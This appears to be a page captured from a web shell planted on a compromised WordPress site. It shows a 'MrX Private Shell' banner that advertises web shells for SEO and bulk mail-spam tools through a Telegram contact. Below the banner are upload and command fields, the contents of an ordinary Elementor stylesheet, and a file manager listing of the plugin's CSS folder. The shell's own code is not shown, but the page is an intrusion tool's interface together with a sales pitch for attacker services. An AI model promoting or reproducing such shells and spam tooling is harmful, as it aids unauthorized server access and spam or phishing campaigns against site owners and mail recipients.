__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
.form-table {
  width: 100%;
  border-collapse: separate;
  border-spacing: 0;
  margin: 0;
  background-color: var(--e-one-palette-background-default);
  border: none;
}
.form-table th {
  color: var(--e-one-palette-text-primary);
  font-weight: 600;
  font-size: 14px;
  padding: 12px 0;
  vertical-align: top;
  width: 219px;
  text-align: start;
  border: none;
  background: transparent;
}
.form-table td {
  color: var(--e-one-palette-text-primary);
  font-size: 13px;
  padding: 12px 0;
  vertical-align: top;
  border: none;
  background: transparent;
}
.form-table tr {
  border-block-end: 1px solid var(--e-one-palette-divider);
  background: transparent;
}
.form-table tr:last-child {
  border-block-end: none;
}
.form-table tr:hover {
  background-color: transparent;
}
.form-table input[type=checkbox] {
  margin: 0;
  margin-inline-end: 4px;
  vertical-align: middle;
  width: 16px;
  height: 16px;
  flex-shrink: 0;
}
.form-table td > label,
.form-table td > .elementor-field-row {
  display: flex;
  align-items: flex-start;
  gap: 4px;
  font-size: 13px;
  color: var(--e-one-palette-text-primary);
  line-height: 1.4;
}
.form-table .description {
  color: var(--e-one-palette-text-tertiary);
  font-size: 13px;
  margin-block-start: 4px;
  display: block;
  line-height: 1.4;
  font-weight: 400;
}
.form-table a {
  color: var(--e-one-palette-info-main);
  text-decoration: none;
}
.form-table a:hover {
  text-decoration: underline;
}
.form-table + h2 {
  margin-block: 1em;
  font-family: var(--e-one-typography-fontFamily);
  font-weight: 600;
  font-size: 18px;
  color: var(--e-one-palette-text-primary);
  line-height: 1.2;
}

.wp-list-table {
  border: 1px solid var(--e-one-palette-divider);
  border-collapse: collapse;
  background-color: var(--e-one-palette-background-default);
  width: 100%;
}
.wp-list-table thead th,
.wp-list-table thead td,
.wp-list-table tfoot th,
.wp-list-table tfoot td {
  background-color: transparent;
  border: none;
  border-block-end: 1px solid var(--e-one-palette-divider);
  color: var(--e-one-palette-text-primary);
  font-family: var(--e-one-typography-fontFamily);
  font-weight: 500;
  font-size: 14px;
  line-height: 24px;
  padding-inline-start: 10px;
  text-align: start;
  vertical-align: middle;
}
.wp-list-table thead th.check-column,
.wp-list-table thead td.check-column,
.wp-list-table tfoot th.check-column,
.wp-list-table tfoot td.check-column {
  text-align: center;
}
.wp-list-table thead th.sortable a, .wp-list-table thead th.sorted a,
.wp-list-table thead td.sortable a,
.wp-list-table thead td.sorted a,
.wp-list-table tfoot th.sortable a,
.wp-list-table tfoot th.sorted a,
.wp-list-table tfoot td.sortable a,
.wp-list-table tfoot td.sorted a {
  color: var(--e-one-palette-text-primary);
}
.wp-list-table tbody tr {
  border-block-end: 1px solid var(--e-one-palette-divider);
  background-color: var(--e-one-palette-background-default);
  font-weight: 400;
}
.wp-list-table tbody tr.alternate, .wp-list-table tbody tr:nth-child(odd), .wp-list-table tbody tr:nth-child(even) {
  background-color: var(--e-one-palette-background-default);
}
.wp-list-table tbody tr:hover {
  background-color: var(--e-one-palette-action-hover);
}
.wp-list-table tbody th.check-column {
  border-block-end: none;
  text-align: center;
}
.wp-list-table tbody td {
  color: var(--e-one-palette-text-primary);
  font-size: 13px;
  font-weight: 400;
  padding: 10px;
}
.wp-list-table tbody td:last-child {
  border-inline-end: none;
}
.wp-list-table tbody tr a,
.wp-list-table tbody tr .button-link,
.wp-list-table tbody td a,
.wp-list-table tbody td .button-link,
.wp-list-table tbody th a,
.wp-list-table tbody th .button-link {
  color: var(--e-one-palette-text-primary);
  text-decoration: none;
}
.wp-list-table tbody tr a:hover,
.wp-list-table tbody tr .button-link:hover,
.wp-list-table tbody td a:hover,
.wp-list-table tbody td .button-link:hover,
.wp-list-table tbody th a:hover,
.wp-list-table tbody th .button-link:hover {
  color: var(--e-one-palette-text-primary);
  text-decoration: underline;
}
.wp-list-table tbody tr a.delete, .wp-list-table tbody tr a[href*="action=trash"], .wp-list-table tbody tr a[href*="action=delete"], .wp-list-table tbody tr a.submitdelete,
.wp-list-table tbody tr .button-link.delete,
.wp-list-table tbody tr .button-link[href*="action=trash"],
.wp-list-table tbody tr .button-link[href*="action=delete"],
.wp-list-table tbody tr .button-link.submitdelete,
.wp-list-table tbody td a.delete,
.wp-list-table tbody td a[href*="action=trash"],
.wp-list-table tbody td a[href*="action=delete"],
.wp-list-table tbody td a.submitdelete,
.wp-list-table tbody td .button-link.delete,
.wp-list-table tbody td .button-link[href*="action=trash"],
.wp-list-table tbody td .button-link[href*="action=delete"],
.wp-list-table tbody td .button-link.submitdelete,
.wp-list-table tbody th a.delete,
.wp-list-table tbody th a[href*="action=trash"],
.wp-list-table tbody th a[href*="action=delete"],
.wp-list-table tbody th a.submitdelete,
.wp-list-table tbody th .button-link.delete,
.wp-list-table tbody th .button-link[href*="action=trash"],
.wp-list-table tbody th .button-link[href*="action=delete"],
.wp-list-table tbody th .button-link.submitdelete {
  color: var(--e-one-palette-error-main);
}
.wp-list-table tbody tr a.delete:hover, .wp-list-table tbody tr a[href*="action=trash"]:hover, .wp-list-table tbody tr a[href*="action=delete"]:hover, .wp-list-table tbody tr a.submitdelete:hover,
.wp-list-table tbody tr .button-link.delete:hover,
.wp-list-table tbody tr .button-link[href*="action=trash"]:hover,
.wp-list-table tbody tr .button-link[href*="action=delete"]:hover,
.wp-list-table tbody tr .button-link.submitdelete:hover,
.wp-list-table tbody td a.delete:hover,
.wp-list-table tbody td a[href*="action=trash"]:hover,
.wp-list-table tbody td a[href*="action=delete"]:hover,
.wp-list-table tbody td a.submitdelete:hover,
.wp-list-table tbody td .button-link.delete:hover,
.wp-list-table tbody td .button-link[href*="action=trash"]:hover,
.wp-list-table tbody td .button-link[href*="action=delete"]:hover,
.wp-list-table tbody td .button-link.submitdelete:hover,
.wp-list-table tbody th a.delete:hover,
.wp-list-table tbody th a[href*="action=trash"]:hover,
.wp-list-table tbody th a[href*="action=delete"]:hover,
.wp-list-table tbody th a.submitdelete:hover,
.wp-list-table tbody th .button-link.delete:hover,
.wp-list-table tbody th .button-link[href*="action=trash"]:hover,
.wp-list-table tbody th .button-link[href*="action=delete"]:hover,
.wp-list-table tbody th .button-link.submitdelete:hover {
  color: var(--e-one-palette-error-main);
}
.wp-list-table .column-title strong {
  color: var(--e-one-palette-text-primary);
  font-weight: 400;
}
.wp-list-table .row-title,
.wp-list-table a.row-title {
  color: var(--e-one-palette-text-primary);
  text-decoration: none;
}
.wp-list-table .row-title:hover,
.wp-list-table a.row-title:hover {
  color: var(--e-one-palette-text-primary);
  text-decoration: underline;
}
.wp-list-table .row-actions * {
  color: var(--e-one-palette-text-primary);
  font-size: 13px;
}
.wp-list-table .row-actions span.sep,
.wp-list-table .row-actions span {
  color: var(--e-one-palette-divider);
  margin-block: 0;
  margin-inline: 4px;
}
.wp-list-table .check-column {
  width: 2.2em;
  padding: 10px;
}
.wp-list-table .check-column input[type=checkbox] {
  margin: 0;
}

#elementor-element-manager-wrap .wp-list-table thead th.sortable button, #elementor-element-manager-wrap .wp-list-table thead th.sorted button {
  all: unset;
  display: flex;
  align-items: center;
  gap: 4px;
  cursor: pointer;
  color: var(--e-one-palette-text-primary);
  font-weight: 500;
  font-size: 14px;
  line-height: 24px;
  width: 100%;
  justify-content: flex-start;
}
#elementor-element-manager-wrap .wp-list-table thead th.sortable button:hover, #elementor-element-manager-wrap .wp-list-table thead th.sorted button:hover {
  color: var(--e-one-palette-text-primary);
}
#elementor-element-manager-wrap .wp-list-table thead th.sortable button .sorting-indicators, #elementor-element-manager-wrap .wp-list-table thead th.sorted button .sorting-indicators {
  display: flex;
  flex-direction: column;
  margin-inline-start: 4px;
}
#elementor-element-manager-wrap .wp-list-table thead th.sortable button .sorting-indicators .sorting-indicator, #elementor-element-manager-wrap .wp-list-table thead th.sorted button .sorting-indicators .sorting-indicator {
  width: 0;
  height: 0;
  border-inline-start: 4px solid transparent;
  border-inline-end: 4px solid transparent;
  margin-block: 1px;
}
#elementor-element-manager-wrap .wp-list-table thead th.sortable button .sorting-indicators .sorting-indicator.asc, #elementor-element-manager-wrap .wp-list-table thead th.sorted button .sorting-indicators .sorting-indicator.asc {
  border-block-end: 4px solid var(--e-one-palette-text-tertiary);
  border-block-start: none;
}
#elementor-element-manager-wrap .wp-list-table thead th.sortable button .sorting-indicators .sorting-indicator.desc, #elementor-element-manager-wrap .wp-list-table thead th.sorted button .sorting-indicators .sorting-indicator.desc {
  border-block-start: 4px solid var(--e-one-palette-text-tertiary);
  border-block-end: none;
}
#elementor-element-manager-wrap .wp-list-table thead th.sortable button.sorted .sorting-indicator.asc, #elementor-element-manager-wrap .wp-list-table thead th.sorted button.sorted .sorting-indicator.asc {
  border-block-end-color: var(--e-one-palette-text-primary);
}
#elementor-element-manager-wrap .wp-list-table thead th.sortable button.sorted .sorting-indicator.desc, #elementor-element-manager-wrap .wp-list-table thead th.sorted button.sorted .sorting-indicator.desc {
  border-block-start-color: var(--e-one-palette-text-primary);
}
#elementor-element-manager-wrap .wp-list-table tbody td .MuiSwitch-root {
  margin: 0;
}
/*# sourceMappingURL=editor-one-tables.css.map */

Filemanager

Name Type Size Permission Actions
conditionals Folder 0775
modules Folder 0775
templates Folder 0775
admin-bar.css File 768 B 0664
admin-bar.min.css File 619 B 0664
admin-top-bar.css File 4.69 KB 0664
admin-top-bar.min.css File 4.04 KB 0664
admin.css File 156.76 KB 0664
admin.min.css File 132.78 KB 0664
app-base-rtl.css File 1.76 KB 0664
app-base-rtl.min.css File 993 B 0664
app-base.css File 1.75 KB 0664
app-base.min.css File 993 B 0664
app-rtl.css File 118.66 KB 0664
app-rtl.min.css File 99.4 KB 0664
app.css File 118.65 KB 0664
app.min.css File 99.4 KB 0664
common-rtl.css File 27.07 KB 0664
common-rtl.min.css File 24.55 KB 0664
common.css File 27.06 KB 0664
common.min.css File 24.55 KB 0664
editor-one-common.css File 17.01 KB 0664
editor-one-common.min.css File 14.68 KB 0664
editor-one-elements.css File 3.81 KB 0664
editor-one-elements.min.css File 3.24 KB 0664
editor-one-tables.css File 9.71 KB 0664
editor-one-tables.min.css File 8.76 KB 0664
editor-one.css File 30.43 KB 0664
editor-one.min.css File 26.68 KB 0664
editor-preview-rtl.css File 142.62 KB 0664
editor-preview-rtl.min.css File 117.16 KB 0664
editor-preview.css File 142.61 KB 0664
editor-preview.min.css File 117.16 KB 0664
editor-rtl.css File 261.28 KB 0664
editor-rtl.min.css File 225.77 KB 0664
editor-v2-app-bar-overrides.css File 1.28 KB 0664
editor-v2-app-bar-overrides.min.css File 1007 B 0664
editor.css File 261.21 KB 0664
editor.min.css File 225.72 KB 0664
frontend.css File 62.81 KB 0664
frontend.min.css File 53.29 KB 0664
responsive-bar.css File 4.23 KB 0664
responsive-bar.min.css File 3.51 KB 0664
theme-dark.css File 2.94 KB 0664
theme-dark.min.css File 2.2 KB 0664
theme-light.css File 2.92 KB 0664
theme-light.min.css File 2.19 KB 0664
widget-accordion-rtl.min.css File 1.7 KB 0664
widget-accordion.min.css File 1.7 KB 0664
widget-alert-rtl.min.css File 1.63 KB 0664
widget-alert.min.css File 1.63 KB 0664
widget-contact-buttons-base-rtl.min.css File 19.68 KB 0664
widget-contact-buttons-base.min.css File 19.68 KB 0664
widget-contact-buttons-var-1-rtl.min.css File 3.42 KB 0664
widget-contact-buttons-var-1.min.css File 3.42 KB 0664
widget-contact-buttons-var-10-rtl.min.css File 9.36 KB 0664
widget-contact-buttons-var-10.min.css File 9.36 KB 0664
widget-contact-buttons-var-3-rtl.min.css File 11.61 KB 0664
widget-contact-buttons-var-3.min.css File 11.61 KB 0664
widget-contact-buttons-var-4-rtl.min.css File 7.8 KB 0664
widget-contact-buttons-var-4.min.css File 7.8 KB 0664
widget-contact-buttons-var-6-rtl.min.css File 3.15 KB 0664
widget-contact-buttons-var-6.min.css File 3.15 KB 0664
widget-contact-buttons-var-7-rtl.min.css File 2.32 KB 0664
widget-contact-buttons-var-7.min.css File 2.32 KB 0664
widget-contact-buttons-var-8-rtl.min.css File 5.38 KB 0664
widget-contact-buttons-var-8.min.css File 5.38 KB 0664
widget-contact-buttons-var-9-rtl.min.css File 9.25 KB 0664
widget-contact-buttons-var-9.min.css File 9.25 KB 0664
widget-contact-buttons-vars-rtl.min.css File 0 B 0664
widget-contact-buttons-vars.min.css File 0 B 0664
widget-counter-rtl.min.css File 753 B 0664
widget-counter.min.css File 753 B 0664
widget-divider-rtl.min.css File 4.16 KB 0664
widget-divider.min.css File 4.16 KB 0664
widget-floating-bars-base-rtl.min.css File 9.3 KB 0664
widget-floating-bars-base.min.css File 9.3 KB 0664
widget-floating-bars-var-2-rtl.min.css File 5.11 KB 0664
widget-floating-bars-var-2.min.css File 5.11 KB 0664
widget-floating-bars-var-3-rtl.min.css File 4.82 KB 0664
widget-floating-bars-var-3.min.css File 4.82 KB 0664
widget-floating-bars-vars-rtl.min.css File 0 B 0664
widget-floating-bars-vars.min.css File 0 B 0664
widget-floating-buttons-rtl.min.css File 91.2 KB 0664
widget-floating-buttons.min.css File 91.2 KB 0664
widget-google_maps-rtl.min.css File 261 B 0664
widget-google_maps.min.css File 261 B 0664
widget-heading-rtl.min.css File 560 B 0664
widget-heading.min.css File 560 B 0664
widget-icon-box-rtl.min.css File 4.62 KB 0664
widget-icon-box.min.css File 4.62 KB 0664
widget-icon-list-rtl.min.css File 10.01 KB 0664
widget-icon-list.min.css File 10.01 KB 0664
widget-image-box-rtl.min.css File 1.62 KB 0664
widget-image-box.min.css File 1.62 KB 0664
widget-image-carousel-rtl.min.css File 342 B 0664
widget-image-carousel.min.css File 342 B 0664
widget-image-gallery-rtl.min.css File 2.36 KB 0664
widget-image-gallery.min.css File 2.36 KB 0664
widget-image-rtl.min.css File 214 B 0664
widget-image.min.css File 214 B 0664
widget-link-in-bio-base-rtl.min.css File 12.11 KB 0664
widget-link-in-bio-base.min.css File 12.11 KB 0664
widget-link-in-bio-rtl.min.css File 17.58 KB 0664
widget-link-in-bio-var-2-rtl.min.css File 821 B 0664
widget-link-in-bio-var-2.min.css File 821 B 0664
widget-link-in-bio-var-3-rtl.min.css File 704 B 0664
widget-link-in-bio-var-3.min.css File 704 B 0664
widget-link-in-bio-var-4-rtl.min.css File 788 B 0664
widget-link-in-bio-var-4.min.css File 788 B 0664
widget-link-in-bio-var-5-rtl.min.css File 1.59 KB 0664
widget-link-in-bio-var-5.min.css File 1.59 KB 0664
widget-link-in-bio-var-7-rtl.min.css File 1.64 KB 0664
widget-link-in-bio-var-7.min.css File 1.64 KB 0664
widget-link-in-bio-vars-rtl.min.css File 0 B 0664
widget-link-in-bio-vars.min.css File 0 B 0664
widget-link-in-bio.min.css File 17.58 KB 0664
widget-menu-anchor-rtl.min.css File 69 B 0664
widget-menu-anchor.min.css File 69 B 0664
widget-nested-accordion-rtl.min.css File 5 KB 0664
widget-nested-accordion.min.css File 5 KB 0664
widget-nested-tabs-rtl.min.css File 14.47 KB 0664
widget-nested-tabs.min.css File 14.47 KB 0664
widget-progress-rtl.min.css File 1.16 KB 0664
widget-progress.min.css File 1.16 KB 0664
widget-rating-rtl.min.css File 1.28 KB 0664
widget-rating.min.css File 1.28 KB 0664
widget-social-icons-rtl.min.css File 4.99 KB 0664
widget-social-icons.min.css File 4.99 KB 0664
widget-spacer-rtl.min.css File 1.75 KB 0664
widget-spacer.min.css File 1.75 KB 0664
widget-star-rating-rtl.min.css File 4.69 KB 0664
widget-star-rating.min.css File 4.69 KB 0664
widget-tabs-rtl.min.css File 4.19 KB 0664
widget-tabs.min.css File 4.19 KB 0664
widget-testimonial-rtl.min.css File 1.61 KB 0664
widget-testimonial.min.css File 1.61 KB 0664
widget-text-editor-rtl.min.css File 680 B 0664
widget-text-editor.min.css File 680 B 0664
widget-text-path-rtl.min.css File 1.02 KB 0664
widget-text-path.min.css File 1.02 KB 0664
widget-toggle-rtl.min.css File 1.51 KB 0664
widget-toggle.min.css File 1.51 KB 0664
widget-video-rtl.min.css File 1.21 KB 0664
widget-video.min.css File 1.21 KB 0664
Filemanager